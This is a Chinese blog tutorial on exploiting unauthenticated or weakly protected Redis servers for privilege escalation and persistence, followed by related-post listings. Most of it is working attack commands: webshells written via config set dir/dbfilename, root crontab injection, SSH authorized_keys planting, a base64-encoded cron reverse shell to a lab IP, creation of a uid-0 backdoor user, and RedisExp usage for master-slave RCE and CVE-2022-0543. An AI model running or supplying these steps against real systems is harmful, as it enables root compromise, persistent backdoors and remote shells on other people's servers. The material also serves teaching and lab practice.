系统入侵与提权之权限维持与Redis提权

最新推荐文章于 2025-04-19 19:10:00 发布
原创 最新推荐文章于 2025-04-19 19:10:00 发布 · 1.3k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#redis #数据库 #系统入侵 #入侵提权 #ssrf+redis提权

文章目录

权限维持与Redis提权

一、Redis基础回顾

1、安装与配置

Redis服务器端: 
Redis客户端:

2、配置远程认证

编辑 redis.conf 配置文件,修改如下选项:
查找 bind,将已有的 bind 127.0.0.1 -::1 注释掉

查找 protected-mode yes,将其修改为:protected-mode no
也可以保留:protected-mode yes
但是设置密码:requirepass 123456

完成上述配置后,使用 pkill redis-server 停止 Redis 服务器,再重启 Redis 即可

此时,使用Redis客户端登录时,必须通过参数 -a 指定密码

./redis-cli -h 192.168.112.188 -p 6379 -a 123456
如果登录本机,并且端口号是默认的6379,则可以不用使用参数 -h-p
如果是远程登录Redis服务器,则 -h 必须明确指定

3、基础命令

set key value
get key 
config set key value
save

image-20230213233746925

二、Redis提权操作

redis 在执行持久化操作时,会将 缓存 数据库中的内容保存在硬盘上,此时就会生成文件,该文件的地址就是 redis.conf 配置文件中的 dir 参数和 dbfilename 参数 组成的文件绝对路径

比如设置 dir=/opt/lampp/htdocs dbfilename=shell.php

那么,持久化进行时就会生成 /opt/lampp/htdocs/shell.php 文件

核心:

Redis以Root启动

成功可以访问到 Redis

image-20240923232542581

1、配置Redis

先尝试匿名登录Redis: redis-cli.exe -h 192.168.112.188

requirepass 字段可以设置密码,也可以不要求密码,如果设置了密码则使用 SNetCracker 进行爆破

2、执行以下脚本,测试是否成功

尝试写入木马

该原理是利用了 redis 非关系型(缓存型)数据库的持久化操作实现写文件

写入木马前:

image-20240924170702798

192.168.230.147:6379> config set dir /opt/lampp/htdocs/img
OK
192.168.230.147:6379> config set dbfilename shell.php
OK
192.168.230.147:6379> set mm "<?php @eval($_POST[a]);?>"
OK
192.168.230.147:6379> save
OK

image-20240924170754399

写入木马后:

image-20240924170819463

说明可以正常利用 redis 写入木马

尝试写一个 root 的 crontab 定时任务
192.168.230.147:6379> config set dir /var/spool/cron/
OK
192.168.230.147:6379> config set dbfilename root
OK
192.168.230.147:6379> set mm "\n\n*/1 * * * * echo '<?php @eval($_POST[a]);?>' > /tmp/test.txt\n\n"
OK
192.168.230.147:6379> get mm
"\n\n*/1 * * * * echo '<?php @eval($_POST[a]);?>' > /tmp/test.txt\n\n"
192.168.230.147:6379> save
OK

image-20240924172101380

去查看一下 root 的 crontab

image-20240924172324790

说明确实写入成功了

image-20240924214048605

redis 本身无法执行 操作系统指令

但是 redis 可以写文件,就比如写入root用户的 crontab 再或者直接写入后门

3、此时以 root 账户运行crontab -l,查看是否写入了一条新的定时任务

[root@centqiang bin]# crontab -l
REDIS0009 redis-ver6.2.5
redis-bitse             used-memV
preamble~ phone                     
1881234567studentsw@QQH zhangsan,lisi,w                                                             wumynameqiangaddrchengducount
*/1 * * * * echo testing > /tmp/test.txt         # 此处写入定时任务成功

sexmalenamewoniuage 1
,[root@centqiang bin]#

4、利用Windows的SSH命令生成公钥

ssh-keygen -t rsa

image-20240926215011682

image-20240926215047498

上传 id_res.pub 至 Linux 服务器的 /root/.ssh 目录下 并命名为 authorized_keys

image-20240926215525212

当然,由于上次输入了 密码短语用于保护 rsa 密钥,所以再次使用 ssh 登录时,不再是要求输入登录密码了,而是要求输入 密码短语 passphrase

image-20240926215741543

5、利用Redis将公钥写入目标主机

当我们获取 redis 服务器登录权限后,可以利用 redis 持久化性质写入 root 的 crontab 定时任务,使得 攻击机的 ssh 公钥写入 目标服务器

(1)先利用Redis创建/root/.ssh目录

192.168.112.188:6379> set 0 "\n\n*/1 * * * * mkdir -p /root/.ssh \n\n"
OK
192.168.112.188:6379> config set dir /var/spool/cron/
OK
192.168.112.188:6379> config set dbfilename root
OK
192.168.112.188:6379> save
OK

等待一分钟

image-20240926220303125

进入实验环境发现确实成功写入,说明此时文件和目录已经创建成功

image-20240926220327616

(2)再写入公钥文件数据

192.168.112.188:6379> set 0 "\n\n*/1 * * * * echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBCGGfboJ7i1deQRFchk9cqqojY9apL2hzCcOUa9hF3duNoGQILEeImhdSwFYpahd6hnNLoIULl+vBuKK9iJCTtF0yemhh/LHEEH5xCvBM7wu2hP4ZyO/0YCwTizDxYsVFFWzx44+IpQ40IsZXLs1h9GhWhoO6cDs995ojxd7N9S/jn9grxY2V0kR5j0lh11fAhRe2DwGtSEYwaT7/1wEERUW7YPAgGpWYaAloEgPk+lxibMzhXYy8H01lRs7Jo+JQDVzzifdpq2KW1i/R/KPQjd/NgMqHFYL36KVBxtLqPmbSI4rTDqtoheQWegnaI/sZOS8lmAXjsfocVHqR/+8J denny@Qiang' > /root/.ssh/authorized_keys\n\n"
OK
192.168.112.188:6379> config set dir /var/spool/cron/
OK
192.168.112.188:6379> config set dbfilename root
OK
192.168.112.188:6379> save
OK
再等待一分钟

image-20240926220621089

进入实验服务器发现 crontab 再次成功写入

image-20240926220659730

等待一分钟,进入实验服务器发现文件写入成功

image-20240926220828308

6、利用Windows自带SSH免密登录

C:\Users\Denny>ssh root@192.168.112.188
Last login: Sun Dec  5 11:31:40 2021 from 192.168.112.1
[root@centqiang ~]#

image-20240926220910494

正是我们使用密钥生成之后链接 ssh 的状况,攻击时,使用空的密码短语生成 公私钥对就好了

Enjoy It !

7、除此之外

也可以直接利用设定持久化数据文件的方式直接写WebShell

192.168.112.188:6379> set myshell "<?php eval($_POST['code']); ?>"
192.168.112.188:6379> config set dir /opt/lampp/htdocs/
192.168.112.188:6379> config set dbfilename myshell.php
192.168.112.188:6379> save

或执行反弹Shell

192.168.112.188:6379> set 1 "\n\n* * * * * echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMi4yMTIvNDQ0NCAwPiYx | base64 -d| bash\n\n"
192.168.112.188:6379> config set dir /var/spool/cron/
192.168.112.188:6379> config set dbfilename root
192.168.112.188:6379> save

或其他可正常执行的命令等,如创建一个影子root用户等

set 2 "\n\n* * * * * echo hacker:12345678|/usr/sbin/chpasswd\n\n"
set 1 "\n\n* * * * * /usr/sbin/useradd -o -u 0 -g 0 hacker\n\n"

三、RedisExp漏洞利用工具

下载地址:https://github.com/Mx1014/RedisEXP

命令用法:

主从复制命令执行:
RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec
RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console

Linux:
RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -so exp.so
RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -exec -console -so exp.so

主从复制文件上传:
RedisExp.exe -rhost 192.168.211.131 -lhost 192.168.211.1 -rfile dump.rdb -lfile dump.rdb -upload

主动关闭主从复制:
RedisExp.exe -rhost 192.168.211.131 -slaveof

Lua沙盒绕过命令执行 CVE-2022-0543:
RedisExp.exe -rhost 192.168.211.131 -lua -console

备份写 Webshell:
RedisExp.exe -rhost 192.168.211.131 -shell

Linux 写计划任务:
RedisExp.exe -rhost 192.168.211.131 -crontab

Linux 写 SSH 公钥:
RedisExp.exe -rhost 192.168.211.131 -ssh

爆破 Redis 密码:
RedisExp.exe -rhost 192.168.211.131 -brute -pwdf ../pass.txt

执行 Redis 命令:
RedisExp.exe -rhost 192.168.211.131 -cli
权限升】61 Redis Postgresql数据库
(∪.∪ )...zzz的博客
08-04 538
目录redis数据库权限Redis未授访问漏洞利用1. 利用计划任务执行命令反弹shell2. 写ssh-keygen公钥后 使用私钥登录3. 往web路径写webshell修复方案-漏洞成因PostgreSQL数据库建立连接、漏洞利用,Windows2008& 7 令牌窃取升-本地Windows2003& 10 进程注入 redis数据库权限redis非关系式,分布式 redis服务因配置不当,可被攻击者恶意利用 黑客借助redis内置命令,可将现有数据恶意清空
权限升之数据库——Redis和PostgreSQL方式
m0_61506558的博客
10-17 854
通过之前对Access、MSSQL(SQL server)和Mysql注入的介绍,大家对数据库方式有了一定的认知,我认为耗时间的是Access,这和它开发的理念有直接的关系,而本次介绍的是Redis和PostgreSQL的,和之前利用的点很相似,会利用到系统自带独特的方式,主要集中在配置文件发生问题,进行反弹连接,进行渗透。权限——Win漏洞及数据库&AT&SC&PS__Cyber的博客-CSDN博客。
- Redis/Postgre数据库
acepanhuan的博客
03-01 750
- Redis/Postgre数据库
Redis
m0_68636078的博客
09-22 549
自用
Redis-
最新发布
dscn123的博客
04-19 678
总结:先用用客户机对服务器监听,并且连接上服务器的redis,设置写入的路径和文件位置在定时任务/var/spool/cron中写入定时触发的反弹连接语句。ssh-copy-id [email protected] #向.66的服务器传输公钥,传输的公钥保存在.ssh/ authorized_keys文件中。打开一个交互式的bash终端,远程机器建立一个socket连接,将标准错误输出合并到标准输出中,将标准输入重定向到标准输出中。2 执行命令,或者上传payload访问,建立连接。
Redis高频面试基本问题知识点整理
热门推荐
张彦峰的博客
04-07 173万+
Redis一些重点内容进行整理总结用于查缺补漏,应对各大互联网大厂面试方向题库
Redis5.0.14 6.2.6 差异
技术引领业务创新
04-16 11万+
Redis 5.0.14 6.2.6 的 核心差异 及对 Java 程序的 影响分析,涵盖协议、性能、安全性等关键领域
〖Python 数据库开发实战 - PythonRedis交互篇⑭〗- 综合案例 - 新闻管理系统 - 更新所编辑新闻状态(编辑角色权限)
易编橙 · 终身成长社群,相遇已是上上签!
10-15 3万+
该章节我们继续来完成 "新闻管理系统" 的编写,上一章节我们是写到了 "修改新闻记录" 的时候,接收用户在控制台输入的各种信息,但是还没有去编写 "news_dao.py" "news_service.py" 的数据库做的修改。如果一条新闻被修改了,无论这条新闻是否审批通过了都要变成 "待审批" 的状态,在 Redis 中已经被缓存的记录要被删除,当被 "管理员" 审批通过 之后,才会被再次的缓存到 Redis 中。
〖Python 数据库开发实战 - PythonRedis交互篇⑫〗- 综合案例 - 新闻管理系统 - 删除新闻(含redis缓存)
易编橙 · 终身成长社群,相遇已是上上签!
10-09 3万+
接下来我们继续来完成《新闻管理系统》 的开发,上一章节我们是将 "审批通过" 的新闻 缓存到了 "redis" 里面。这一章节我们就来实现一下,当 "管理员" 执行 "删除新闻" 的时候,MySQL Redis 里面的记录都删除的功能吧。
〖Python 数据库开发实战 - PythonRedis交互篇①〗- redis-py的安装使用
易编橙 · 终身成长社群,相遇已是上上签!
09-22 4万+
该章节开始我们又回到了 Python 领域,接下来我们将学习利用 Python 语言去读写 redis 的数据。之前操作 redis ,是在客户端通过一些指令来实现的,在 Python 中操作 redis 的依然还是这些指令,所以掌握了 redis 的命令数据类型, Python 的程序就很好写了。在 Python 中操作 redis 的第三方模块有很多,这里推荐使用 redis-py 这个模块,不仅是因为它很容易使用,更因为它自带连接池。接下来就正式的进入学习环节吧。
python脚本实现Redis未授批量
09-09
主要给大家介绍了关于利用python脚本实现redis未授批量的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧。
黑客攻防Redis拉锯战之Root
qq_40907977的博客
05-19 2164
转载来源:记一次重大安全事故,黑客攻防Redis拉锯战之Root :http://www.safebase.cn/article-259347-1.html 摘要: 黑客攻击前言要想做一名优秀的程序员,除去个人扎实的基础技能这一不可或缺的因素,还有一个更加不能忽略的潜在意识。那就是——安全防范意识!为什么说,安全防范意识会成为另外一个不可或缺的因素,你且听我慢慢道来。服务器被植入木马linux其实这件事情呢,也就发生在前几天。公司需要部署一套新的 … 前言 要想做一名优秀的程序员,除去个人扎实的基础
基于Redis实战
zj2084的博客
03-17 652
首先去看一下redis的配置文件requirepass,默认是没有密码的bind,直接将bind 127.0.0.1 -::1给注释掉,不仅仅由本地可以登录,还允许其他远程进行登录。
数据库Redis未授访问常见方式
ssrf
03-02 1047
目录0x001 验证是否存在未授访问0x002 利用计划任务执行命令反弹shell0x003 通过向Web目录中写webshell的方式进行getshell0x004 通过写SSH key的方式进行getshell0x005 修复方案 0x001 验证是否存在未授访问 Redis在默认情况会将服务绑定在6379端口上,从而将服务暴露在公网环境下,如果在没有开启安全认证的情况下,可以导致任意用户未授访问Redis服务器并Redis进行读写等操作。 使用redis客户端redis-cli.exe连接,
权限升-系统权限升篇&数据库&Postsql&Redis&第三方软件&密码凭据&钓鱼文件
SuperherRo的博客
03-24 1813
1、数据库到Linux-数据库-Redis 3、数据库到Linux-数据库-PostgreSQL 4、计算机用户到系统-第三方软件-各类应用 章节点: 1、Web权限升及转移 2、系统权限升及转移 3、宿主权限升及转移 4、域控权限升及转移
Centos Docker部署教程_docker部署centos
2401_84281655的博客
04-28 1003
docker pull ubuntu:后面跟docker hub的版本参数。docker pull ubuntu #自动拉取最新版本ubuntu。大纲路线、讲解视频,并且后续会持续更新**
Centos7 下 redis 入侵实战 - root
DevOps海洋的渔夫@专栏
12-06 524
知识铺垫 Redis 还有几个奇怪的功能:Linux 有一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件是木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。 那么下面来实战演练一下通过redis匿名登陆写入反弹shell 环境准备 首先启动一个允许匿名登陆的redis服务器。 [...
redis3种未授访问
梳碧湖的砍柴人
10-07 808
redis及部分
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值